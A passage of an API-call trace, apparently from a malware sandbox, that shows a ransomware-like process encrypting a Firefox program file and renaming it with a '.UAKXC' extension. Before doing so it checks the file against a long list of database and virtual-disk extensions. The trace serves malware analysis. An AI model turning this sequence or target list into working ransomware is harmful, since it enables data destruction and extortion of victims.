[0139.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed008 | out: hHeap=0xea0000) returned 1 [0139.940] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0139.940] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0139.940] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0139.941] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete")) returned 0x20 [0139.942] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.942] GetLastError () returned 0x0 [0139.942] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=2019) returned 1 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".4dd") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".4dl") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accdb") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accdc") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accde") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accdr") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accdt") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accft") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".adb") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ade") returned 0x0 [0139.942] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".adf") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".adp") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".arc") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ora") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".alf") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ask") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".btr") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".bdf") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".cat") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".cdb") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ckp") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".cma") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".cpd") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dacpac") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dad") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dadiagrams") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".daschema") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".db") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".db-shm") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".db-wal") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".db3") returned 0x0 [0139.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dbc") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dbf") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dbs") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dbt") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dbv") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dbx") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dcb") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dct") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dcx") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ddl") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dlis") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dp1") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dqy") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dsk") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dsn") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dtsx") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".dxl") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".eco") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ecx") returned 0x0 [0139.944] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".edb") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".epim") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".exb") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fcd") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fdb") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fic") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fmp") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fmp12") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fmpsl") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fol") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fp3") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fp4") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fp5") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fp7") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fpt") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".frm") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".gdb") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".grdb") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".gwi") returned 0x0 [0139.945] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".hdb") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".his") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ib") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".idb") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ihx") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".itdb") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".itw") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".jet") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".jtx") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".kdb") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".kexi") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".kexic") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".kexis") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".lgc") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".lwx") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".maf") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".maq") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mar") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mas") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mav") returned 0x0 [0139.946] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mdb") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mdf") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mpd") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mrg") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mud") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mwb") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".myd") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ndf") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nnt") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nrmlib") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ns2") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ns3") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".ns4") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nsf") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nv") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nv2") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nwdb") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nyf") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".odb") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".oqy") returned 0x0 [0139.947] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".orx") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".owc") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".p96") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".p97") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".pan") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".pdb") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".pdm") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".pnz") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".qry") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".qvd") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".rbf") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".rctd") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".rod") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".rodx") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".rpd") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".rsd") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sas7bdat") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sbf") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".scx") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sdb") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sdc") returned 0x0 [0139.948] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sdf") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sis") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".spq") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sql") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sqlite") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sqlite3") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".sqlitedb") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".te") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".temx") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".tmd") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".tps") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".trc") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".trm") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".udb") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".udl") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".usr") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".v12") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vis") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vpd") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vvv") returned 0x0 [0139.949] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".wdb") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".wmdb") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".wrk") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".xdb") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".xld") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".xmlff") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".abcddb") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".abs") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".abx") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".accdw") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".adn") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".db2") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".fm5") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".hjt") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".icg") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".icr") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".kdb") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".lut") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".maw") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mdn") returned 0x0 [0139.950] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".mdt") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vdi") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vhd") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmdk") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".pvm") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmem") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmsn") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmsd") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".nvram") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmx") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".raw") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".qcow2") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".subvol") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".bin") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vsv") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".avhd") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmrs") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vhdx") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".avdx") returned 0x0 [0139.951] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".vmcx") returned 0x0 [0139.952] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpSrch=".iso") returned 0x0 [0139.952] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.952] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.026] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.027] SetEndOfFile (hFile=0x210) returned 1 [0140.027] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.027] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x7e3, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x7e3, lpOverlapped=0x0) returned 1 [0140.027] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffff81d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.027] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x7e3, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x7e3, lpOverlapped=0x0) returned 1 [0140.027] CloseHandle (hObject=0x210) returned 1 [0140.032] GetProcessHeap () returned 0xea0000 [0140.032] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef04c8 [0140.032] lstrcpyW (in: lpString1=0xef04c8, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete") returned="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" [0140.033] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.UAKXC" [0140.033] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete.uakxc")) returned 1 [0140.034] GetProcessHeap () returned 0xea0000 [0140.034] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef04c8 | out: hHeap=0xea0000) returned 